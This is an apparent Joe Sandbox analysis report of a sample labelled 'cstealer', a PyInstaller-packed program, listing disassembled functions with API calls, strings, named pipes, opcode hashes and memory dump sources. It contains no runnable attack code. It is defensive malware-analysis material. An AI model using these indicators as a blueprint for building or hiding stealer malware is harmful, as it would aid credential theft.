                                                                                                                                                            • Opcode Fuzzy Hash: 10be7354ae7ed2204115d902d03c55829f90979370bef0a99dab41979069eecf
                                                                                                                                                            • Instruction Fuzzy Hash: 8E519261B0978246EB30EB21A4552FA63D4EF45FC4F504071EE4DCBBA5EE6CEE499300
                                                                                                                                                            Function 00007FF6957F6CE0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                            • Opcode ID: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                                                                                                                            • Instruction ID: b66471f0a7c6396a3935d96cfdee6ddaf33586b40be2b6da98c41ef17952a964
                                                                                                                                                            • Opcode Fuzzy Hash: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                                                                                                                            • Instruction Fuzzy Hash: 1B129362A0C183A6FB34DA14E04467D76E1FF80F54F944175EE9A8A6C4DF3CEE84AB11
                                                                                                                                                            Function 00007FF6957F18F8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                            • Opcode ID: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                                                                                                                            • Instruction ID: 347974fc2d94b1460cce67802108c934f28b85e7e3c9b73d6b57d816681c5eac
                                                                                                                                                            • Opcode Fuzzy Hash: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                                                                                                                            • Instruction Fuzzy Hash: 4912A362E0D18386FB34DA15D05427976E1FB80B54FD44175EE9A8AAC4DF7CEE80EB10
                                                                                                                                                            Function 00007FF6957E8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                            • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                            • API String ID: 2895956056-3524285272
                                                                                                                                                            • Opcode ID: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                                                                                                                            • Instruction ID: cfdbd3fd7b660c0a2c424b5b6f8c1a633897912c8092c1956966af3f6bab0495
                                                                                                                                                            • Opcode Fuzzy Hash: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                                                                                                                            • Instruction Fuzzy Hash: 07414331A0878281DA30DB64E5452AAB3D0FF94B64F500776EAAD877D5DF7CD558CB00
                                                                                                                                                            Function 00000271DC672244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                            • Instruction ID: 752ea400637ce8e33754e154e28fb255856b1936b70075aafb157cd863fa7752
                                                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                            • Instruction Fuzzy Hash: 27213D72619B40C7EB208FA9F54875A63A1FB89BA4F500A15EB5D06BE8DF7CC159CF00
                                                                                                                                                            Function 00000271DC67A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                            • Instruction ID: a0c62df6dc8890b2da45e52d0f666dc37eb92a871148ea2912857b43576cc31c
                                                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                            • Instruction Fuzzy Hash: 7DE17E7260A7408AEF709FA9D44839D77A0FB45B98F201D15EE8D57F9AEB34C5A1CB00
                                                                                                                                                            Function 00000271DC649944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                            • Instruction ID: a7f562649a02862e517ef090344a41ddd1547fb57f37995e53499a99213f1980
                                                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                            • Instruction Fuzzy Hash: 2BE1A47260EB408EEB70DFA9D44939DB7A6FB45798F100915EE8D57B59CB34C4A2CB00
                                                                                                                                                            Function 00007FF6957EF330 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                                                                                                                            • Instruction ID: e10033a5f5473bb22071ffcc9ecd8853d5c128d29529a3a180ff1219f1ff284f
                                                                                                                                                            • Opcode Fuzzy Hash: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                                                                                                                            • Instruction Fuzzy Hash: 13D18F32A087428AEB309F2594402FD37E0FB55B98F500575DE8D9BBA5DF38EA99C700
                                                                                                                                                            Function 00007FF6957FF9C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6957FFD5A,?,?,-00000018,00007FF6957FBB0B,?,?,?,00007FF6957FBA02,?,?,?,00007FF6957F698E), ref: 00007FF6957FFB3C
                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6957FFD5A,?,?,-00000018,00007FF6957FBB0B,?,?,?,00007FF6957FBA02,?,?,?,00007FF6957F698E), ref: 00007FF6957FFB48
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                            • Opcode ID: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                                                                                                                            • Instruction ID: 040e25986f8faf533a0711932ce9eb312c5fa3fcb837093e04cfa924e06dba82
                                                                                                                                                            • Opcode Fuzzy Hash: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                                                                                                                            • Instruction Fuzzy Hash: 0241EE32B19A1281FA36DF26A9146B522D1FF09FA0F094976DD1DDB794EE3CEE449300
                                                                                                                                                            Function 00000271DC67F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                            • Instruction ID: 170ddb6f3a3a15e4d6a062cbbe8144e3a48732fb61b4da7a746edd872212fd45
                                                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                            • Instruction Fuzzy Hash: 3141F77131BA009AEE35CFAEA908B562391BF44BA0F544D25AD0D87BC9FE3CC4658B44
                                                                                                                                                            Function 00007FF6957E89B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E8A47
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E8A9E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                            • API String ID: 626452242-27947307
                                                                                                                                                            • Opcode ID: 89553e7cd300324a6f724f73f484e3f7697aeb2be2e7a1e8a5647cf5d5c3735f
                                                                                                                                                            • Instruction ID: ded981255f39ca838bd8fdeebbea47581dc0c4f625f9c4f347b49f5f9e0b49fc
                                                                                                                                                            • Opcode Fuzzy Hash: 89553e7cd300324a6f724f73f484e3f7697aeb2be2e7a1e8a5647cf5d5c3735f
                                                                                                                                                            • Instruction Fuzzy Hash: CA418F32A09B8282E670CF15B8411BAB6E1FB84B90F544575DE8D8BBA4DF3CD956D700
                                                                                                                                                            Function 00000271DC67104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction ID: 0542fbcdb95e2b0466278a15cbbd2c344923ebf524bbccbbf0f03c0051450a34
                                                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                            • Instruction Fuzzy Hash: 2B416373215B84CAEB60CFA5E45839A77A1F784B98F448515DB8D0BB58DF3CC555CB00
                                                                                                                                                            Function 00007FF6957E8EF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6957E39CA), ref: 00007FF6957E8F31
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: MessageBoxW.USER32 ref: 00007FF6957E2AD0
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6957E39CA), ref: 00007FF6957E8FA5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                            • Opcode ID: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                                                                                                                            • Instruction ID: cf79d8ba8234ba8130926bf2f033509dd152023923e8a55abb3df6f8088f3fb7
                                                                                                                                                            • Opcode Fuzzy Hash: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                                                                                                                            • Instruction Fuzzy Hash: 3B218261B09B4285E720DF26E9440B9B2D2EF84F80F544576DA4D8BBA5EF3CEA458300
                                                                                                                                                            Function 00000271DC67D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D087
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D0A6
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D0CE
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D0DF
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000271DC67C7DE,?,?,?,?,?,?,?,?,00000271DC67CF9D,?,?,00000001), ref: 00000271DC67D0F0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID: 1%$Y%
                                                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction ID: 94d480aeb8751792b76ed29e937c36aebedea347c07b03b76ef13de8c4dea0b9
                                                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                            • Instruction Fuzzy Hash: DB11AC3030E24449FE78AFBD995E7A921415F943F0F245F24A82D06BEAFE38C4768E00
                                                                                                                                                            Function 00000271DC677510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction ID: 595853833a4a5a312de764f48ca070a042db4e53e70d922ebbfa6997deed1104
                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction Fuzzy Hash: 1881C37160F3418EFE729FED944939962D1AF45B80F544D259A0C87BDAFBB8C8658F00
                                                                                                                                                            Function 00007FF6957E77B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                            • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                            • API String ID: 3231891352-3501660386
                                                                                                                                                            • Opcode ID: 37f188308be49b72cd36607779045425a90e915aadacb2b24e56b1bac9d89fa7
                                                                                                                                                            • Instruction ID: be3970b5b4a5df2889ee01b90e3e55c642ea5611d0b213f7320b62fee4b0b65c
                                                                                                                                                            • Opcode Fuzzy Hash: 37f188308be49b72cd36607779045425a90e915aadacb2b24e56b1bac9d89fa7
                                                                                                                                                            • Instruction Fuzzy Hash: 01517D21A1D79251FA30AB25A9492F962D5DF84FD0F4441B1ED4ECE7E6EE2CFE088310
                                                                                                                                                            Function 00007FF6957E7630 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6957E8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6957E7BB1,00000000,?,00000000,00000000,?,00007FF6957E153F), ref: 00007FF6957E768F
                                                                                                                                                              • Part of subcall function 00007FF6957E2B10: MessageBoxW.USER32 ref: 00007FF6957E2BE5
                                                                                                                                                            Strings
                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6957E7666
                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6957E76A3
                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6957E76EA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                            • API String ID: 1662231829-3498232454
